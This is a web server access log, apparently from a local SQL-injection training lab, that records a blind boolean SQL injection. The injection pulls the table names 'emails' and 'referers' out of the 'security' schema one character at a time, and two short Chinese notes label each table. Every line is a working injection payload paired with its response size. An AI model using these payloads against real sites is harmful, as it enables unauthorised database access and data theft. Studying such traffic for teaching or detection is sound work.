10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479),2,1))>51 AND 'eEWK'='eEWK HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479),2,1))>48 AND 'eEWK'='eEWK HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479),2,1))>9 AND 'eEWK'='eEWK HTTP/1.1" 200 670

emails 表

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),1,1))>64 AND 'epTE'='epTE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),1,1))>96 AND 'epTE'='epTE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),1,1))>112 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),1,1))>104 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),1,1))>100 AND 'epTE'='epTE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),1,1))>102 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),1,1))>101 AND 'epTE'='epTE HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),2,1))>96 AND 'epTE'='epTE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),2,1))>112 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),2,1))>104 AND 'epTE'='epTE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),2,1))>108 AND 'epTE'='epTE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),2,1))>110 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),2,1))>109 AND 'epTE'='epTE HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),3,1))>96 AND 'epTE'='epTE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),3,1))>112 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),3,1))>104 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),3,1))>100 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),3,1))>98 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),3,1))>97 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),4,1))>96 AND 'epTE'='epTE HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),4,1))>112 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),4,1))>104 AND 'epTE'='epTE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),4,1))>108 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),4,1))>106 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),4,1))>105 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),5,1))>96 AND 'epTE'='epTE HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),5,1))>112 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),5,1))>104 AND 'epTE'='epTE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),5,1))>108 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),5,1))>106 AND 'epTE'='epTE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),5,1))>107 AND 'epTE'='epTE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),6,1))>96 AND 'epTE'='epTE HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),6,1))>112 AND 'epTE'='epTE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),6,1))>120 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),6,1))>116 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),6,1))>114 AND 'epTE'='epTE HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),6,1))>115 AND 'epTE'='epTE HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),7,1))>96 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),7,1))>48 AND 'epTE'='epTE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),7,1))>1 AND 'epTE'='epTE HTTP/1.1" 200 670

referers 表

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),1,1))=101 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),1,1))>64 AND 'Lsky'='Lsky HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),1,1))>96 AND 'Lsky'='Lsky HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),1,1))>112 AND 'Lsky'='Lsky HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),1,1))>120 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),1,1))>116 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),1,1))>114 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),1,1))>113 AND 'Lsky'='Lsky HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),2,1))>96 AND 'Lsky'='Lsky HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),2,1))>112 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),2,1))>104 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),2,1))>100 AND 'Lsky'='Lsky HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),2,1))>102 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),2,1))>101 AND 'Lsky'='Lsky HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),3,1))>96 AND 'Lsky'='Lsky HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),3,1))>112 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),3,1))>104 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),3,1))>100 AND 'Lsky'='Lsky HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),3,1))>102 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),3,1))>101 AND 'Lsky'='Lsky HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),4,1))>96 AND 'Lsky'='Lsky HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),4,1))>112 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),4,1))>104 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),4,1))>100 AND 'Lsky'='Lsky HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),4,1))>102 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),4,1))>101 AND 'Lsky'='Lsky HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),5,1))>96 AND 'Lsky'='Lsky HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),5,1))>112 AND 'Lsky'='Lsky HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),5,1))>120 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),5,1))>116 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),5,1))>114 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),5,1))>113 AND 'Lsky'='Lsky HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),6,1))>96 AND 'Lsky'='Lsky HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),6,1))>112 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),6,1))>104 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),6,1))>100 AND 'Lsky'='Lsky HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),6,1))>102 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),6,1))>101 AND 'Lsky'='Lsky HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),7,1))>96 AND 'Lsky'='Lsky HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),7,1))>112 AND 'Lsky'='Lsky HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),7,1))>120 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),7,1))>116 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),7,1))>114 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),7,1))>113 AND 'Lsky'='Lsky HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),8,1))>96 AND 'Lsky'='Lsky HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),8,1))>112 AND 'Lsky'='Lsky HTTP/1.1" 200 750
